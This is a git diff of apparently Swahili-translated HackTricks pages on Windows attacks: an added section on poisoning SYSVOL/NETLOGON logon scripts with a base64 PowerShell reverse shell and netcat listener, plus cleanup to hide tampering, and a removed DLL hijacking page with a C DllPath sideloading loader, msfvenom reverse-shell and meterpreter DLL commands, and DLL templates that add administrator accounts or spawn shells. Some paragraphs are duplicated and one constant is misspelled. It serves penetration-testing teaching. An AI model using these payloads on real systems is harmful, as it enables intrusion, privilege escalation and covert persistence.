GPOs pia zinaruhusu kudhibiti uanachama wa watumiaji na vikundi kwenye mifumo ya lengo. Kwa kuhariri faili za sera za Users and Groups moja kwa moja, wahalifu wanaweza kuongeza watumiaji kwenye vikundi vyenye madaraka, kama vile kikundi cha ndani cha `administrators`. Hii inawezekana kupitia udelegeshaji wa ruhusa za usimamizi wa GPO, ambao unaruhusu mabadiliko ya faili za sera ili kujumuisha watumiaji wapya au kubadilisha uanachama wa vikundi.
|
||||
|
||||
Faili ya usanidi ya XML kwa Watumiaji na Vikundi inaelezea jinsi mabadiliko haya yanavyotekelezwa. Kwa kuongeza rekodi kwenye faili hii, watumiaji maalum wanaweza kupewa haki zilizoinuliwa kwa mifumo yote iliyohusishwa. Njia hii inatoa njia ya moja kwa moja ya kuinua hadhi kupitia uhariri wa GPO.
|
||||
Faili ya usanidi ya XML ya Users and Groups inaeleza jinsi mabadiliko haya yanavyotekelezwa. Kwa kuongeza rekodi kwenye faili hili, watumiaji maalum wanaweza kupewa ruhusa za juu kwenye mifumo yote iliyohusishwa. Njia hii inatoa njia ya moja kwa moja ya kupandisha viwango vya ruhusa kupitia kuingiliwa kwa GPO.
|
||||
|
||||
Zaidi ya hayo, mbinu nyingine za kutekeleza msimbo au kudumisha udumishaji, kama vile kutumia logon/logoff scripts, kurekebisha registry keys kwa ajili ya autoruns, kusakinisha software kupitia .msi files, au kuhariri service configurations, pia zinaweza kuzingatiwa. Mbinu hizi zinatoa njia mbalimbali za kudumisha upatikanaji na kudhibiti mifumo ya lengo kupitia unyonyaji wa GPOs.
|
||||
Zaidi ya hayo, mbinu nyingine za kutekeleza msimbo au kudumisha uwepo, kama vile kutumia logon/logoff scripts, kubadilisha registry keys kwa ajili ya autoruns, kusanidi software kupitia .msi files, au kuhariri configurations za service, pia zinaweza kuzingatiwa. Mbinu hizi zinatoa njia mbalimbali za kudumisha ufikiaji na kudhibiti mifumo ya lengo kupitia matumizi mabaya ya GPOs.
|
||||
|
||||
## Marejeo
|
||||
## SYSVOL/NETLOGON Logon Script Poisoning
|
||||
|
||||
Writable paths under `\\<dc>\SYSVOL\<domain>\scripts\` or `\\<dc>\NETLOGON\` allow tampering with logon scripts executed at user logon via GPO. This yields code execution in the security context of logging users.
|
||||
|
||||
### Locate logon scripts
|
||||
- Kagua sifa za watumiaji kwa logon script iliyosanidiwa:
|
||||
```powershell
|
||||
Get-DomainUser -Identity <user> -Properties scriptPath, scriptpath
|
||||
```
|
||||
- Pitia domain shares ili kuibua shortcuts au marejeo ya scripts:
|
||||
```bash
|
||||
# NetExec spider (authenticated)
|
||||
netexec smb <dc_fqdn> -u <user> -p <pass> -M spider_plus
|
||||
```
|
||||
- Changanua faili za `.lnk` ili kutatua malengo yanayolenga ndani ya SYSVOL/NETLOGON (mbinu muhimu ya DFIR na kwa washambulizi wasiokuwa na ufikiaji wa moja kwa moja wa GPO):
|
||||
```bash
|
||||
# LnkParse3
|
||||
lnkparse login.vbs.lnk
|
||||
# Example target revealed:
|
||||
# C:\Windows\SYSVOL\sysvol\<domain>\scripts\login.vbs
|
||||
```
|
||||
- BloodHound inaonyesha sifa ya `logonScript` (scriptPath) kwenye nodi za watumiaji inapopo.
|
||||
|
||||
### Thibitisha ufikiaji wa kuandika (usiamini orodha za share)
|
||||
Vifaa vya kiotomatiki vinaweza kuonyesha SYSVOL/NETLOGON kama read-only, lakini ACL za NTFS zilizo chini zinaweza bado kuruhusu uandishi. Daima jaribu:
|
||||
```bash
|
||||
# Interactive write test
|
||||
smbclient \\<dc>\SYSVOL -U <user>%<pass>
|
||||
smb: \\> cd <domain>\scripts\
|
||||
smb: \\<domain>\scripts\\> put smallfile.txt login.vbs # check size/time change
|
||||
```
|
||||
Kama ukubwa wa faili au mtime inabadilika, una uwezo wa kuandika. Hifadhi nakala za awali kabla ya kuhariri.
|
||||
|
||||
### Sumisha script ya kuingia ya VBScript kwa RCE
|
||||
Ongeza amri inayozindua PowerShell reverse shell (itengenezwe kutoka revshells.com) na uhifadhi mantiki ya asili ili kuepuka kuvunja kazi za biashara:
|
||||
```vb
|
||||
' At top of login.vbs
|
||||
Set cmdshell = CreateObject("Wscript.Shell")
|
||||
cmdshell.run "powershell -e <BASE64_PAYLOAD>"
|
||||
|
||||
' Existing mappings remain
|
||||
MapNetworkShare "\\\\<dc_fqdn>\\apps", "V"
|
||||
MapNetworkShare "\\\\<dc_fqdn>\\docs", "L"
|
||||
```
|
||||
Sikiliza kwenye mwenyeji wako na usubiri interactive logon ujao:
|
||||
```bash
|
||||
rlwrap -cAr nc -lnvp 443
|
||||
```
|
||||
Vidokezo:
|
||||
- Utekelezaji hufanyika chini ya token ya mtumiaji aliyeingia (not SYSTEM). Wigo ni kiungo cha GPO (OU, site, domain) kinachotumika kutekeleza script hiyo.
|
||||
- Fanya usafi kwa kurejesha yaliyomo/alama za wakati za awali baada ya matumizi.
|
||||
|
||||
## Marejeleo
|
||||
|
||||
- [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces)
|
||||
- [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges)
|
||||
@ -189,5 +282,9 @@ Zaidi ya hayo, mbinu nyingine za kutekeleza msimbo au kudumisha udumishaji, kama
|
||||
- [https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
|
||||
- [https://adsecurity.org/?p=3658](https://adsecurity.org/?p=3658)
|
||||
- [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule\_\_ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType\_](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule__ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType_)
|
||||
- [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule__ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType_](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule__ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType_)
|
||||
- [BloodyAD – AD attribute/UAC operations from Linux](https://github.com/CravateRouge/bloodyAD)
|
||||
- [Samba – net rpc (group membership)](https://www.samba.org/)
|
||||
- [HTB Puppy: AD ACL abuse, KeePassXC Argon2 cracking, and DPAPI decryption to DC admin](https://0xdf.gitlab.io/2025/09/27/htb-puppy.html)
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@ -1,320 +0,0 @@
|
||||
# Dll Hijacking
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
## Taarifa za Msingi
|
||||
|
||||
DLL Hijacking inahusisha kumfanya programu inayotambulika ipakie DLL mbaya. Neno hili linajumuisha mbinu kadhaa kama **DLL Spoofing, Injection, and Side-Loading**. Inatumiwa sana kwa ajili ya utekelezaji wa msimbo, kupata persistence, na, kwa rari, kuinua vibali. Licha ya kuzingatia escalation hapa, mbinu ya hijacking inabaki ile ile kulingana na lengo.
|
||||
|
||||
### Mbinu za Kawaida
|
||||
|
||||
Kuna mbinu kadhaa zinazotumika kwa DLL hijacking, kila moja ikiwa na ufanisi wake kulingana na mkakati wa programu wa kupakia DLL:
|
||||
|
||||
1. **DLL Replacement**: Kubadilisha DLL halali na moja mbaya, kwa hiari kutumia DLL Proxying ili kuhifadhi utendaji wa DLL asili.
|
||||
2. **DLL Search Order Hijacking**: Kuweka DLL mbaya katika njia ya utafutaji kabambe ya DLL halali, ukitumia muundo wa utafutaji wa programu.
|
||||
3. **Phantom DLL Hijacking**: Kuunda DLL mbaya ambayo programu itahisi ni DLL iliyohitajika ambayo haipo.
|
||||
4. **DLL Redirection**: Kurekebisha vigezo vya utafutaji kama %PATH% au faili .exe.manifest / .exe.local ili kuelekeza programu kwa DLL mbaya.
|
||||
5. **WinSxS DLL Replacement**: Kubadilisha DLL halali na toleo mbaya katika direktorio ya WinSxS, mbinu inayohusishwa mara nyingi na DLL side-loading.
|
||||
6. **Relative Path DLL Hijacking**: Kuweka DLL mbaya katika saraka inayodhibitiwa na mtumiaji pamoja na programu iliyo kopiwa, kufanana na mbinu za Binary Proxy Execution.
|
||||
|
||||
## Kupata Dll zilizokosekana
|
||||
|
||||
Njia ya kawaida ya kupata Dll zilizokosekana ndani ya mfumo ni kuendesha [procmon](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon) kutoka sysinternals, **kuweka** **filter mbili zifuatazo**:
|
||||
|
||||
.png>)
|
||||
|
||||
.png>)
|
||||
|
||||
naonyesha tu **File System Activity**:
|
||||
|
||||
.png>)
|
||||
|
||||
Ikiwa unatafuta **dll zilizokosekana kwa ujumla** unaacha hii ikikimbia kwa **sekunde kadhaa**.\
|
||||
Ikiwa unatafuta **dll iliyokosekana ndani ya executable maalumu** unapaswa kuweka **filter nyingine kama "Process Name" "contains" "\<exec name>", kuendesha executable, na kusitisha kurekodi matukio**.
|
||||
|
||||
## Kutumia Dll Zilizokosekana
|
||||
|
||||
Ili kuinua vibali, nafasi bora tunayo ni kuwa na uwezo wa **kuandika dll ambayo mchakato wenye vibali ataijaribu kupakia** katika moja ya **mahali ambapo itaangaliwa**. Kwa hiyo, tunaweza **kuandika** dll katika **folda** ambapo **dll inatafutwa kabla** ya folda ambapo **dll asili** iko (hali isiyo ya kawaida), au tunaweza kuandika kwenye folda fulani ambapo dll itatafutwa na dll asili haipo katika folda yoyote.
|
||||
|
||||
### Dll Search Order
|
||||
|
||||
**Ndani ya** [**Microsoft documentation**](https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#factors-that-affect-searching) **unaweza kuona jinsi Dll zinavyopakuliwa kwa undani.**
|
||||
|
||||
Programu za Windows zinatafuta DLL kwa kufuata seti ya **njia za utafutaji zilizowekwa awali**, zikifuata mfuatano maalumu. Tatizo la DLL hijacking linapotokea ni pale ambapo DLL hatari imewekwa kimkakati katika moja ya saraka hizi, kuhakikisha inapakiwa kabla ya DLL halisi. Suluhisho la kuzuia hili ni kuhakikisha programu inatumia njia za absolute inaporejea kwa DLL zinazohitajika.
|
||||
|
||||
Unaweza kuona **mpangilio wa utafutaji wa DLL kwenye mifumo ya 32-bit** hapa chini:
|
||||
|
||||
1. The directory from which the application loaded.
|
||||
2. The system directory. Use the [**GetSystemDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya) function to get the path of this directory.(_C:\Windows\System32_)
|
||||
3. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched. (_C:\Windows\System_)
|
||||
4. The Windows directory. Use the [**GetWindowsDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) function to get the path of this directory.
|
||||
1. (_C:\Windows_)
|
||||
5. The current directory.
|
||||
6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the **App Paths** registry key. The **App Paths** key is not used when computing the DLL search path.
|
||||
|
||||
Hilo ndilo mpangilio wa **default** wa utafutaji ukiwa na **SafeDllSearchMode** imewezeshwa. Wakati imezimwa saraka ya sasa inasonga hadi nafasi ya pili. Ili kuzima kipengele hiki, tengeneza thamani ya rejista **HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager**\\**SafeDllSearchMode** na uite 0 (default ni enabled).
|
||||
|
||||
Ikiwa [**LoadLibraryEx**](https://docs.microsoft.com/en-us/windows/desktop/api/LibLoaderAPI/nf-libloaderapi-loadlibraryexa) inaitwa na **LOAD_WITH_ALTERED_SEARCH_PATH** utafutaji unaanza katika saraka ya module ya executable ambayo **LoadLibraryEx** inapakia.
|
||||
|
||||
Mwisho, kumbuka kwamba **dll inaweza kupakiwa ukionyesha njia kamili badala ya jina tu**. Katika kesi hiyo dll hiyo **itatafutwa tu katika njia hiyo** (ikiwa dll ina dependencies, zitatafutwa kama zilipakiwa kwa jina tu).
|
||||
|
||||
Kuna njia nyingine za kubadilisha mpangilio wa utafutaji lakini sitazielezea hapa.
|
||||
|
||||
### Forcing sideloading via RTL_USER_PROCESS_PARAMETERS.DllPath
|
||||
|
||||
Njia ya juu ya kuathiri kwa uhakika njia ya utafutaji ya DLL ya mchakato mpya iliyoundwa ni kuweka shamba DllPath katika RTL_USER_PROCESS_PARAMETERS wakati wa kuunda mchakato kwa kutumia native APIs za ntdll. Kwa kutoa saraka inayodhibitiwa na mwizi hapa, mchakato lengwa ambao unatambua DLL iliyoinuliwa kwa jina (bila njia kamili na bila kutumia flag za safe loading) unaweza kulazimishwa kupakia DLL mbaya kutoka saraka hiyo.
|
||||
|
||||
Wazo kuu
|
||||
- Jenga vigezo vya mchakato na RtlCreateProcessParametersEx na toa DllPath maalumu inayofanya pointi kwa folda yako unayotawala (mfano, saraka ambako dropper/unpacker yako iko).
|
||||
- Unda mchakato na RtlCreateUserProcess. Wakati binary lengwa itapotatua DLL kwa jina, loader itatafuta DllPath iliyotolewa wakati wa utatuzi, kuwezesha sideloading inayotegemewa hata pale DLL mbaya haiko pamoja na EXE lengwa.
|
||||
|
||||
Vidokezo / vikwazo
|
||||
- Hii inaathiri mchakato mtoto unaoundwa; ni tofauti na SetDllDirectory, ambayo inaathiri mchakato wa sasa pekee.
|
||||
- Lengwa lazima aimport au kutumia LoadLibrary kwa DLL kwa jina (bila njia kamili na bila kutumia LOAD_LIBRARY_SEARCH_SYSTEM32/SetDefaultDllDirectories).
|
||||
- KnownDLLs na njia zilizo hardcoded absolute haziwezi kuibiwa. Forwarded exports na SxS zinaweza kubadilisha upendeleo.
|
||||
|
||||
Minimal C example (ntdll, wide strings, simplified error handling):
|
||||
```c
|
||||
#include <windows.h>
|
||||
#include <winternl.h>
|
||||
#pragma comment(lib, "ntdll.lib")
|
||||
|
||||
// Prototype (not in winternl.h in older SDKs)
|
||||
typedef NTSTATUS (NTAPI *RtlCreateProcessParametersEx_t)(
|
||||
PRTL_USER_PROCESS_PARAMETERS *pProcessParameters,
|
||||
PUNICODE_STRING ImagePathName,
|
||||
PUNICODE_STRING DllPath,
|
||||
PUNICODE_STRING CurrentDirectory,
|
||||
PUNICODE_STRING CommandLine,
|
||||
PVOID Environment,
|
||||
PUNICODE_STRING WindowTitle,
|
||||
PUNICODE_STRING DesktopInfo,
|
||||
PUNICODE_STRING ShellInfo,
|
||||
PUNICODE_STRING RuntimeData,
|
||||
ULONG Flags
|
||||
);
|
||||
|
||||
typedef NTSTATUS (NTAPI *RtlCreateUserProcess_t)(
|
||||
PUNICODE_STRING NtImagePathName,
|
||||
ULONG Attributes,
|
||||
PRTL_USER_PROCESS_PARAMETERS ProcessParameters,
|
||||
PSECURITY_DESCRIPTOR ProcessSecurityDescriptor,
|
||||
PSECURITY_DESCRIPTOR ThreadSecurityDescriptor,
|
||||
HANDLE ParentProcess,
|
||||
BOOLEAN InheritHandles,
|
||||
HANDLE DebugPort,
|
||||
HANDLE ExceptionPort,
|
||||
PRTL_USER_PROCESS_INFORMATION ProcessInformation
|
||||
);
|
||||
|
||||
static void DirFromModule(HMODULE h, wchar_t *out, DWORD cch) {
|
||||
DWORD n = GetModuleFileNameW(h, out, cch);
|
||||
for (DWORD i=n; i>0; --i) if (out[i-1] == L'\\') { out[i-1] = 0; break; }
|
||||
}
|
||||
|
||||
int wmain(void) {
|
||||
// Target Microsoft-signed, DLL-hijackable binary (example)
|
||||
const wchar_t *image = L"\\??\\C:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseSampleUploader.exe";
|
||||
|
||||
// Build custom DllPath = directory of our current module (e.g., the unpacked archive)
|
||||
wchar_t dllDir[MAX_PATH];
|
||||
DirFromModule(GetModuleHandleW(NULL), dllDir, MAX_PATH);
|
||||
|
||||
UNICODE_STRING uImage, uCmd, uDllPath, uCurDir;
|
||||
RtlInitUnicodeString(&uImage, image);
|
||||
RtlInitUnicodeString(&uCmd, L"\"C:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseSampleUploader.exe\"");
|
||||
RtlInitUnicodeString(&uDllPath, dllDir); // Attacker-controlled directory
|
||||
RtlInitUnicodeString(&uCurDir, dllDir);
|
||||
|
||||
RtlCreateProcessParametersEx_t pRtlCreateProcessParametersEx =
|
||||
(RtlCreateProcessParametersEx_t)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlCreateProcessParametersEx");
|
||||
RtlCreateUserProcess_t pRtlCreateUserProcess =
|
||||
(RtlCreateUserProcess_t)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlCreateUserProcess");
|
||||
|
||||
RTL_USER_PROCESS_PARAMETERS *pp = NULL;
|
||||
NTSTATUS st = pRtlCreateProcessParametersEx(&pp, &uImage, &uDllPath, &uCurDir, &uCmd,
|
||||
NULL, NULL, NULL, NULL, NULL, 0);
|
||||
if (st < 0) return 1;
|
||||
|
||||
RTL_USER_PROCESS_INFORMATION pi = {0};
|
||||
st = pRtlCreateUserProcess(&uImage, 0, pp, NULL, NULL, NULL, FALSE, NULL, NULL, &pi);
|
||||
if (st < 0) return 1;
|
||||
|
||||
// Resume main thread etc. if created suspended (not shown here)
|
||||
return 0;
|
||||
}
|
||||
```
|
||||
Operational usage example
|
||||
- Place a malicious xmllite.dll (exporting the required functions or proxying to the real one) in your DllPath directory.
|
||||
- Launch a signed binary known to look up xmllite.dll by name using the above technique. The loader resolves the import via the supplied DllPath and sideloads your DLL.
|
||||
|
||||
Mbinu hii imeonekana katika mazingira halisi kuendesha minyororo ya sideloading yenye hatua nyingi: launcher wa awali hutoa DLL msaidizi, ambayo kisha huanzisha binary iliyotiwa saini na Microsoft, inayoweza kuibiwa, yenye DllPath maalum ili kulazimisha kupakia DLL ya mshambuliaji kutoka kwenye saraka ya staging.
|
||||
|
||||
|
||||
#### Isipokuwa katika mpangilio wa utafutaji wa DLL (kulingana na nyaraka za Windows)
|
||||
|
||||
Certain exceptions to the standard DLL search order are noted in Windows documentation:
|
||||
|
||||
- Wakati a **DLL that shares its name with one already loaded in memory** inapotokea, mfumo hupitisha utafutaji wa kawaida. Badala yake, hufanya ukaguzi wa redirection na manifest kabla ya kurudi kwenye DLL iliyopo kwenye memory. **In this scenario, the system does not conduct a search for the DLL**.
|
||||
- Katika matukio ambapo DLL inatambulika kama **known DLL** kwa toleo la sasa la Windows, mfumo utatumia toleo lake la known DLL, pamoja na DLL zake zote zinazotegemea, **forgoing the search process**. Kifunguo cha rejista **HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs** linaorodhesha DLL hizi zinazojulikana.
|
||||
- Iwapo **DLL ina dependencies**, utafutaji wa DLL hizi tegemezi unafanywa kana kwamba zilielezwa tu kwa **module names**, bila kujali kama DLL ya awali ilitambulishwa kwa njia kamili.
|
||||
|
||||
### Kupandisha Vibali
|
||||
|
||||
**Mahitaji**:
|
||||
|
||||
- Tambua mchakato unaofanya kazi au utakaoanzishwa chini ya **different privileges** (horizontal or lateral movement), ambao **lacking a DLL**.
|
||||
- Hakikisha kuna **write access** kwa **directory** yoyote ambamo **DLL** itatafutwa. Mahali hapa inaweza kuwa saraka ya executable au saraka ndani ya system path.
|
||||
|
||||
Ndio, mahitaji ni magumu kuyapata kwa kuwa **by default it's kind of weird to find a privileged executable missing a dll** na ni hata **more weird to have write permissions on a system path folder** (kwa chaguo la kawaida hutaweza). Hata hivyo, katika mazingira yaliyoratibiwa vibaya hii inawezekana.\
|
||||
Katika tukio una bahati na unapata kuwa unakidhi mahitaji, unaweza angalia mradi wa [UACME](https://github.com/hfiref0x/UACME). Hata kama **main goal of the project is bypass UAC**, unaweza kupata hapo **PoC** ya Dll hijaking kwa toleo la Windows ambayo unaweza kutumia (labda kwa kubadilisha njia ya folda ambapo una write permissions).
|
||||
|
||||
Note that you can **check your permissions in a folder** doing:
|
||||
```bash
|
||||
accesschk.exe -dqv "C:\Python27"
|
||||
icacls "C:\Python27"
|
||||
```
|
||||
Na **angalia ruhusa za folda zote ndani ya PATH**:
|
||||
```bash
|
||||
for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )
|
||||
```
|
||||
Unaweza pia kuangalia imports za executable na exports za dll kwa:
|
||||
```c
|
||||
dumpbin /imports C:\path\Tools\putty\Putty.exe
|
||||
dumpbin /export /path/file.dll
|
||||
```
|
||||
Kwa mwongozo kamili kuhusu jinsi ya **abuse Dll Hijacking to escalate privileges** with permissions to write in a **System Path folder** check:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
|
||||
{{#endref}}
|
||||
|
||||
### Automated tools
|
||||
|
||||
[**Winpeas** ](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) itakagua ikiwa una ruhusa za kuandika kwenye folda yoyote ndani ya system PATH.\
|
||||
Zana nyingine za kiotomatiki zinazovutia za kugundua udhaifu huu ni **PowerSploit functions**: _Find-ProcessDLLHijack_, _Find-PathDLLHijack_ and _Write-HijackDll._
|
||||
|
||||
### Example
|
||||
|
||||
Iwapo utapata senario inayoweza kutumiwa, moja ya mambo muhimu zaidi ili kui-exploit kwa mafanikio itakuwa **create a dll that exports at least all the functions the executable will import from it**. Hata hivyo, kumbuka kwamba Dll Hijacking inakuja muhimu ili [escalate from Medium Integrity level to High **(bypassing UAC)**](../authentication-credentials-uac-and-efs.md#uac) au kutoka[ **High Integrity to SYSTEM**](#from-high-integrity-to-system)**.** Unaweza kupata mfano wa **how to create a valid dll** ndani ya utafiti huu wa dll hijacking ulioangazia dll hijacking kwa execution: [**https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows**](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows)**.**\
|
||||
Zaidi ya hayo, katika **next sectio**n unaweza kupata baadhi ya **basic dll codes** ambazo zinaweza kuwa muhimu kama **templates** au kuunda **dll with non required functions exported**.
|
||||
|
||||
## **Creating and compiling Dlls**
|
||||
|
||||
### **Dll Proxifying**
|
||||
|
||||
Kwa msingi, **Dll proxy** ni Dll inayoweza **execute your malicious code when loaded** lakini pia **expose** na **work** kama **exected** kwa **relaying all the calls to the real library**.
|
||||
|
||||
Kwa kutumia zana [**DLLirant**](https://github.com/redteamsocietegenerale/DLLirant) or [**Spartacus**](https://github.com/Accenture/Spartacus) unaweza kwa kweli **indicate an executable and select the library** unayotaka ku-proxify na **generate a proxified dll** au **indicate the Dll** na **generate a proxified dll**.
|
||||
|
||||
### **Meterpreter**
|
||||
|
||||
**Get rev shell (x64):**
|
||||
```bash
|
||||
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
|
||||
```
|
||||
**Pata meterpreter (x86):**
|
||||
```bash
|
||||
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
|
||||
```
|
||||
**Unda mtumiaji (x86 sikuwahi kuona toleo la x64):**
|
||||
```
|
||||
msfvenom -p windows/adduser USER=privesc PASS=Attacker@123 -f dll -o msf.dll
|
||||
```
|
||||
### Yako mwenyewe
|
||||
|
||||
Zingatia kwamba katika matukio kadhaa Dll unayo-compile lazima **export several functions** ambazo zitapakiwa na victim process; ikiwa hizi functions hazipo, **binary won't be able to load** them na **exploit will fail**.
|
||||
```c
|
||||
// Tested in Win10
|
||||
// i686-w64-mingw32-g++ dll.c -lws2_32 -o srrstr.dll -shared
|
||||
#include <windows.h>
|
||||
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
|
||||
switch(dwReason){
|
||||
case DLL_PROCESS_ATTACH:
|
||||
system("whoami > C:\\users\\username\\whoami.txt");
|
||||
WinExec("calc.exe", 0); //This doesn't accept redirections like system
|
||||
break;
|
||||
case DLL_PROCESS_DETACH:
|
||||
break;
|
||||
case DLL_THREAD_ATTACH:
|
||||
break;
|
||||
case DLL_THREAD_DETACH:
|
||||
break;
|
||||
}
|
||||
return TRUE;
|
||||
}
|
||||
```
|
||||
|
||||
```c
|
||||
// For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
|
||||
// For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
|
||||
|
||||
#include <windows.h>
|
||||
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
|
||||
if (dwReason == DLL_PROCESS_ATTACH){
|
||||
system("cmd.exe /k net localgroup administrators user /add");
|
||||
ExitProcess(0);
|
||||
}
|
||||
return TRUE;
|
||||
}
|
||||
```
|
||||
|
||||
```c
|
||||
//x86_64-w64-mingw32-g++ -c -DBUILDING_EXAMPLE_DLL main.cpp
|
||||
//x86_64-w64-mingw32-g++ -shared -o main.dll main.o -Wl,--out-implib,main.a
|
||||
|
||||
#include <windows.h>
|
||||
|
||||
int owned()
|
||||
{
|
||||
WinExec("cmd.exe /c net user cybervaca Password01 ; net localgroup administrators cybervaca /add", 0);
|
||||
exit(0);
|
||||
return 0;
|
||||
}
|
||||
|
||||
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
|
||||
{
|
||||
owned();
|
||||
return 0;
|
||||
}
|
||||
```
|
||||
|
||||
```c
|
||||
//Another possible DLL
|
||||
// i686-w64-mingw32-gcc windows_dll.c -shared -lws2_32 -o output.dll
|
||||
|
||||
#include<windows.h>
|
||||
#include<stdlib.h>
|
||||
#include<stdio.h>
|
||||
|
||||
void Entry (){ //Default function that is executed when the DLL is loaded
|
||||
system("cmd");
|
||||
}
|
||||
|
||||
BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
|
||||
switch (ul_reason_for_call){
|
||||
case DLL_PROCESS_ATTACH:
|
||||
CreateThread(0,0, (LPTHREAD_START_ROUTINE)Entry,0,0,0);
|
||||
break;
|
||||
case DLL_THREAD_ATTACH:
|
||||
case DLL_THREAD_DETACH:
|
||||
case DLL_PROCESS_DEATCH:
|
||||
break;
|
||||
}
|
||||
return TRUE;
|
||||
}
|
||||
```
|
||||
## Marejeo
|
||||
|
||||
- [https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e](https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e)
|
||||
- [https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html](https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html)
|
||||
|
||||
|
||||
|
||||
- [Check Point Research – Nimbus Manticore Deploys New Malware Targeting Europe](https://research.checkpoint.com/2025/nimbus-manticore-deploys-new-malware-targeting-europe/)
|
||||
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
Loading…
x
Reference in New Issue
Block a user